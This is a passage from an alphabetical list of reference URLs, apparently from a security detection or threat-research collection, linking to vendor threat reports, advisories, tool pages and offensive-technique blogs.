ntrinsec.com/apt27-analysis/\nhttps://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html\nhttps://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html\nhttps://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges\nhttps://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone\nhttps://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\nhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz\nhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\nhttps://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing\nhttps://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement\nhttps://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll\nhttps://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2\nhttps://www.joesandbox.com/analysis/443736/0/html\nhttps://www.joesandbox.com/analysis/465533/0/html\nhttps://www.joesandbox.com/analysis/476188/1/iochtml\nhttps://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D\nhttps://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04\nhttps://www.joesandbox.com/analysis/790122/0/html\nhttps://www.joeware.net/freetools/tools/adfind/\nhttps://www.jpcert.or.jp/english/pub/sr/ir_research.html\nhttps://www.justice.gov/file/1080281/download\nhttps://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources\nhttps://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/\nhttps://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html\nhttps://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware\nhttps://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone\nhttps://www.lexjansen.com/sesug/1993/SESUG93035.pdf\nhttps://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/\nhttps://www.linkedin.com/feed/update/urn:li:activity:7282295814792605698/\nhttps://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al\nhttps://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-\nhttps://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/\nhttps://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/\nhttps://www.localpotato.com/\nhttps://www.localpotato.com/localpotato_html/LocalPotato.html\nhttps://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/\nhttps://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/\nhttps://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/\nhttps://www.logpoint.com/en/blog/shenanigans-of-scheduled-tasks/\nhttps://www.loobins.io/binaries/hdiutil/\nhttps://www.loobins.io/binaries/launchctl/\nhttps://www.loobins.io/binaries/sysctl/#\nhttps://www.loobins.io/binaries/tmutil/\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://www.makeuseof.com/how-to-install-and-use-doas/\nhttps://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage\nhttps://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl\nhttps://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf\nhttps://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method\nhttps://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html\nhttps://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html\nhttps://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html\nhttps://www.mandiant.com/resources/blog/accellion-fta-exploited-for-data-theft-and-extortion\nhttps://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nhttps://www.mandiant.com/resources/blog/fin7-shim-databases-persistence\nhttps://www.mandiant.com/resources/blog/infected-usb-steal-secrets\nhttps://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign\nhttps://www.mandiant.com/resources/blog/lnk-between-browsers\nhttps://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign\nhttps://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques\nhttps://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit\nhttps://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\nhttps://www.mandiant.com/resources/blog/ukraine-and-sandworm-team\nhttps://www.mandiant.com/resources/blog/wannacry-ransomware-campaign\nhttps://www.mandiant.com/resources/blog/zero-day-moveit-data-theft\nhttps://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling\nhttps://www.mandiant.com/resources/evolution-of-fin7\nhttps://www.mandiant.com/resources/russian-targeting-gov-business\nhttps://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\nhttps://www.manpagez.com/man/8/firmwarepasswd/\nhttps://www.manpagez.com/man/8/PlistBuddy/\nhttps://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/\nhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/\nhttps://www.mdeditor.tw/pl/pgRt\nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\nhttps://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/\nhttps://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\nhttps://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/\nhttps://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/\nhttps://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/\nhttps://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/\nhttps://www.microsoft.com/en-us/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/\nhttps://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/\nhttps://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nhttps://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\nhttps://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/\nhttps://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\nhttps://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/\nhttps://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\nhttps://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/\nhttps://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nhttps://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nhttps://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nhttps://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/\nhttps://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/\nhttps://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png\nhttps://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A\nhttps://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/\nhttps://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/\nhttps://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/\nhttps://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\nhttps://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\nhttps://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\nhttps://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nhttps://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\nhttps://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\nhttps://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\nhttps://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/\nhttps://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/\nhttps://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\nhttps://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/\nhttps://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/\nhttps://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations\nhttps://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/\nhttps://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/\nhttps://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/\nhttps://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/\nhttps://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)\nhttps://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/\nhttps://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\nhttps://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\nhttps://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/\nhttps://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data\nhttps://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan\nhttps://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/\nhttps://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/\nhttps://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/\nhttps://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/\nhttps://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nhttps://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\nhttps://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nhttps://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nhttps://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS\nhttps://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/\nhttps://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\nhttps://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/\nhttps://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/\nhttps://www.nextron-systems.com/?s=antivirus\nhttps://www.nirsoft.net/utils/nircmd.html\nhttps://www.nirsoft.net/utils/nircmd2.html#using\nhttps://www.offensive-security.com/metasploit-unleashed/timestomp/\nhttps://www.openwall.com/lists/oss-security/2019/10/14/1\nhttps://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf\nhttps://www.packetlabs.net/posts/clipboard-data-security/\nhttps://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/\nhttps://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things\nhttps://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/\nhttps://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf\nhttps://www.papercut.com/kb/Main/PO-1216-and-PO-1219\nhttps://www.passcape.com/windows_password_recovery_dpapi_credhist\nhttps://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\nhttps://www.pdq.com/pdq-deploy/\nhttps://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation\nhttps://www.php.net/manual/en/features.commandline.php\nhttps://www.phpied.com/make-your-javascript-a-windows-exe/\nhttps://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks\nhttps://www.pingcastle.com/documentation/scanner/\nhttps://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html\nhttps://www.poolwatch.io/coin/monero\nhttps://www.poweradmin.com/paexec/\nhttps://www.powershellgallery.com/packages/DSInternals\nhttps://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019\nhttps://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/\nhttps://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\nhttps://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new\nhttps://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages\nhttps://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/\nhttps://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\nhttps://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841\nhttps://www.pureid.io/dumping-abusing-windows-credentials-part-1/\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html\nhttps://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/\nhttps://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/\nhttps://www.py2exe.org/\nhttps://www.python.org/dev/peps/pep-0249/#exceptions\nhttps://www.qemu.org/docs/master/system/invocation.html#hxtool-5\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\nhttps://www.qurium.org/alerts/targeted-malware-against-crph/\nhttps://www.radmin.fr/\nhttps://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/\nhttps://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection\nhttps://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/\nhttps://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/\nhttps://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/\nhttps://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/\nhttps://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/\nhttps://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/\nhttps://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\nhttps://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/\nhttps://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/\nhttps://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/\nhttps://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\nhttps://www.rarlab.com/vuln_rev3_names.html\nhttps://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/\nhttps://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nhttps://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/\nhttps://www.reddit.com/r/sysadmin/comments/13wxuej/comment/jmhdg55/\nhttps://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob\nhttps://www.remoteutilities.com/support/kb/host-service-won-t-start/\nhttps://www.revshells.com/\nhttps://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\nhttps://www.roboform.com/\nhttps://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\nhttps://www.sans.edu/cyber-research/from-crash-compromise-unlocking-potential-windows-crash-dumps-offensive-security/\nhttps://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/\nhttps://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/\nhttps://www.sans.org/blog/red-team-tactics-hiding-windows-services/\nhttps://www.sans.org/blog/wmic-for-incident-response/\nhttps://www.sans.org/cyber-security-summit/archives\nhttps://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf\nhttps://www.sans.org/webcasts/119395\nhttps://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395\nhttps://www.scythe.io/library/threat-emulation-qakbot\nhttps://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/\nhttps://www.secura.com/blog/zero-logon\nhttps://www.secureworks.com/blog/ransomware-as-a-distraction\nhttps://www.secureworks.com/research/bronze-butler-targets-japanese-businesses\nhttps://www.secureworks.com/research/shadowpad-malware-analysis\nhttps://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/\nhttps://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/\nhttps://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/\nhttps://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/\nhttps://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/\nhttps://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/\nhttps://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/\nhttps://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\nhttps://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/\nhttps://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/\nhttps://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/\nhttps://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/\nhttps://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/\nhttps://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/\nhttps://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\nhttps://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/\nhttps://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf\nhttps://www.shellhacks.com/clear-history-powershell/\nhttps://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nhttps://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors\nhttps://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/\nhttps://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/\nhttps://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/\nhttps://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml\nhttps://www.softwaretestinghelp.com/how-to-use-ngrok/\nhttps://www.spamhaus.org/reputation-statistics/cctlds/domains/\nhttps://www.spamhaus.org/statistics/tlds/\nhttps://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\nhttps://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf\nhttps://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html\nhttps://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nhttps://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html\nhttps://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html\nhttps://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html\nhttps://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return\nhttps://www.swascan.com/cactus-ransomware-malware-analysis/\nhttps://www.sygnia.co/golden-saml-advisory\nhttps://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets\nhttps://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap\nhttps://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html\nhttps://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nhttps://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/\nhttps://www.tarasco.org/security/pwdump_7/\nhttps://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/\nhttps://www.teamviewer.com/en-us/\nhttps://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/\nhttps://www.tecmint.com/different-types-of-linux-shells/\nhttps://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server\nhttps://www.tenable.com/security/research/tra-2021-13\nhttps://www.tenable.com/security/research/tra-2023-11\nhttps://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html\nhttps://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html\nhttps://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html\nhttps://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html\nhttps://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/\nhttps://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html\nhttps://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\nhttps://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg\nhttps://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\nhttps://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\nhttps://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html\nhttps://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\nhttps://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html\nhttps://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html\nhttps://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\nhttps://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html\nhttps://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html\nhttps://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\nhttps://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html\nhttps://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html\nhttps://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nhttps://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\nhttps://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\nhttps://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html\nhttps://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html\nhttps://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html\nhttps://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html\nhttps://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\nhttps://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nhttps://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html\nhttps://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html\nhttps://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html\nhttps://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html\nhttps://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html\nhttps://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html\nhttps://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html\nhttps://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-sh